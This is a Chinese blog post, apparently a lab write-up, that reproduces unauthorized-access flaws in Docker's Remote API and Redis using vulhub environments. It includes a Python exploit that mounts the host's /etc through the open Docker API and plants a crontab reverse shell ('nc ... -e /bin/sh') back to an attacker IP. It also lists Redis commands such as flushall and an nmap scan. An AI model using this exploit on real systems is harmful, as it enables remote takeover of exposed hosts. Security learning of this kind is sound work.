未授权漏洞复现

最新推荐文章于 2024-06-11 17:05:35 发布
最新推荐文章于 2024-06-11 17:05:35 发布
阅读量308 收藏
点赞数
文章标签: 安全 docker web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43123409/article/details/121329127
版权

未授权漏洞复现

docker daemon api 未授权访问漏洞

Docker Remote API未授权访问漏洞

docker swarmdocker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供。

漏洞发现的起因是,一位同学在使用docker swarm的时候,发现了管理的docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,http访问会返回 404 page not found ,
然后他研究了下,发现这是 Docker Remote API,可以执行docker命令
比如访问 http://host:2375/containers/json 会返回服务器当前运行的 container列表,和在docker CLI上执行 docker ps 的效果一样,
其他操作比如创建/删除container,拉取image等操作也都可以通过API调用完成

编译及启动漏洞环境:
docker-compose build
docker-compose up -d
环境启动后,将监听2375端口。
访问 http://192.168.33.130:2375/version 验证是否搭建成功
在这里插入图片描述

漏洞复现

利用方法是,我们随意启动一个容器,并将宿主机的/etc目录挂载到容器中,便可以任意读写文件了。
我们可以将命令写入crontab配置文件,进行反弹shell。

攻击机kali 192.168.33.129
靶机Ubuntu 192.168.33.130
exp.py

import docker

client = docker.DockerClient(base_url='http://192.168.33.130:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 192.168.33.129 4444 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

windows运行这个exp.py没成功反弹

换个exp

import docker

client = docker.DockerClient(base_url='http://192.168.33.130:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 192.168.33.129 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

我的环境有点唉

http://luckyzmj.cn/posts/a398fa24.html
https://vulhub.org/#/environments/docker/unauthorized-rce/

Redis 4.x/5.x 未授权访问漏洞

https://blog.csdn.net/weixin_41598660/article/details/105884729

kali 安装redis

在这里插入图片描述
ubuntu192.168.33.130 启动靶场环境 https://vulhub.org/#/environments/redis/4-unacc/

 docker-compose up -d

环境启动后,通过redis-cli -h 192.168.33.130 即可进行连接,可见存在未授权访问漏洞。
在这里插入图片描述

其中redis数据库的一些操作

dbsize 查看所有key的数目
flushdb 删除当前选择数据库中的所有key
flushall 删除所有数据库中的所有key
save: 将数据同步保存到磁盘
bgsave: 异步保存
lastsave: 上次成功保存到磁盘的Unix时间戳
info: 查询server信息
config: 配置server
slaveof: 改变复制策略设置

在这里插入图片描述

注:授予redis-cli一个全局使用的权限,用着比较方便

sudo cp /opt/redis-5.0.8/src/redis-cli /usr/local/bin/

在这里插入图片描述

其他

如果只是漏洞挖掘,不深入拿shell,以下步骤即可。
对靶机的一个6379 redis的端口探测
nmap -p 6379 -script redis-info 192.168.33.130

鲨鱼饿死了
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
zookeeper授权访问修复建议
07-14
ZooKeeper 授权访问修复建议 ZooKeeper 作为一个分布式应用程序协调服务,提供了高效、可靠的分布式锁、队列、节点管理等功能。但是,如果 ZooKeeper 没有正确地配置访问权限,就可能会出现授权访问的问题,...
CVE-2019-16097:Harbor任意管理员注册漏洞复现
Sylon的博客
10-10 1089
0x00 Harbor简介 Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。 作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全。提升用户使用Registry构建和运行环境传输镜像的效率。 0x01 原理概述 该漏...
2.授权访问漏洞复现
weixin_52963334的博客
09-08 253
作业。
Docker授权访问漏洞详解
m0_64481831的博客
06-11 1215
Docker是一个开源的引擎,可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。
Harbor授权访问漏洞(CVE-2022-46463)
m0_49025459的博客
04-29 6784
是为企业用户设计的容器镜像仓库开源项目,包括了权限管理(RBAC)、LDAP、审计、安全漏洞扫描、镜像验真、管理界面、自我注册、HA等企业必需的功能,同时针对中国用户的特点,设计镜像复制和中文支持等功能。
Docker API 授权访问 getshell——漏洞复现
W小哥
10-22 4945
一、Docker介绍 Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台Docker。 二、Docker API 授权访问介绍 Docker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6 因为权限控制等问题导致可以通过 docker client 或
Harbor禁用swagger.json(Swagger授权访问漏洞
czm的博客
09-15 2604
VMwareHarbor镜像仓库默认使用了swagger ui,也因此暴露了swagger.json文件。在安全要求高的环境下会触发“Swagger授权访问漏洞”,虽然暴露的信息不是特别关键。但仍然是信息泄露,需要禁用swagger.json的访问。
(2375端口)docker swarm端口开放导致授权的访问到获取系统shell的过程
weixin_50464560的博客
12-25 986
本文记录了从一次授权的访问到获取系统shell的渗透测试过程,文中主要阐述了攻击方法、漏洞成因以及防御思路。在进行攻防过程阶段,最重要的工作莫过于信息收集,本文不想记录对信息收集中的数据反复甄别的过程,而是想对一次重大的发现进行过程记录,通过对收集的数据进行反复的筛选发现了2375端口,相信很多在做云原生或者做容器化部署的朋友,应该对这个端口不陌生,没错这个就是docker swarm。从官方的文档可以看出swarm是用来管理docker集群的,本次获取shell权限的过程就与此有着莫大的关系。 起因 有
常见授权访问漏洞总结
mingyqf的博客
01-18 3472
常见授权访问漏洞总结 https://xz.aliyun.com/t/6103#toc-12 小维 / 2019-08-28 09:10:00 / 浏览数 46708 安全技术 众测渗透[顶(13)](javascript:) [踩(0)](javascript:) 本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 常见的授权访问漏洞: Redis 授权访问漏洞 MongoDB 授权访问漏洞 Jenkins 授权访问漏洞 Memcached 授权访问漏洞 JBOSS
Docker授权API逃逸
qq_69775412的博客
04-19 2226
一、Docker授权介绍: dockerswarm: docker swarm是一个将docker集群变成单一虚拟的dockerhost工具,使用标准的DockerAPI,能够方便docker集群的管理和扩展,由docker官方提供,具体的大家可以看官网介绍:https://docs.docker.com/engine/swarm/ 漏洞起因: 在使用dockerswarm的时候,发现管理的docker节点上会开放一个tcp端口2375,并且绑定在0.0.0.0上,http访问会返回404p...
Jenkins授权访问RCE漏洞复现
公众号shadow sock7
02-22 1143
修改默认端口: java -jar jenkins.war --ajp13Port=-1 --httpPort=8081
Docker API授权漏洞复现
crowsec
01-27 4089
如果在docker上配置了远程访问,docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,如果没有做限制的话,攻击者就可以通过Docker授权来控制服务器 扫取二维码获取更多信息! 微信公众号:乌鸦安全 扫取二维码获取更多信息!
安全笔记-Docker daemon api 授权访问漏洞复现及利用
NoooEmotion的博客
02-07 1417
授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
docker授权漏洞蜜罐模拟与捕获分析
include_voidmain的博客
08-09 416
docker授权漏洞蜜罐模拟与捕获分析
Java JMX 授权访问漏洞复现
最新发布
06-28
JMX(Java Management Extensions)是Java平台提供的一种管理Java应用程序和组件的标准机制。然而,如果不妥善配置,JMX服务可能会存在授权访问漏洞,允许授权的用户获取敏感信息或执行操作。 复现Java JMX授权访问漏洞的一般步骤如下: 1. **环境准备**: - 确保目标系统上启用了JMX,并且有一个可远程管理的应用程序暴露了MBean(Managed Bean)。 - 需要一个支持JMX的客户端工具,如Java自带的`jconsole`或第三方工具如`jmxterm`。 2. **识别目标服务**: - 使用`jconsole`或类似工具扫描目标服务器,查看哪些MBeans正在监听并开放到网络。 3. **验证权限**: - 通常JMX默认使用`java.security.auth.login.config`文件中的用户和密码来管理访问控制。检查此配置是否允许匿名访问或者有明显的错误。 4. **尝试连接**: - 如果配置允许,可以直接使用`jconsole`、`jmxterm`等工具尝试连接,看是否能无授权访问MBean。 5. **发现漏洞**: - 如果能够无授权访问,那么说明存在授权访问漏洞,可能是因为没有正确配置访问策略,或者是默认的匿名权限设置过于宽松。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值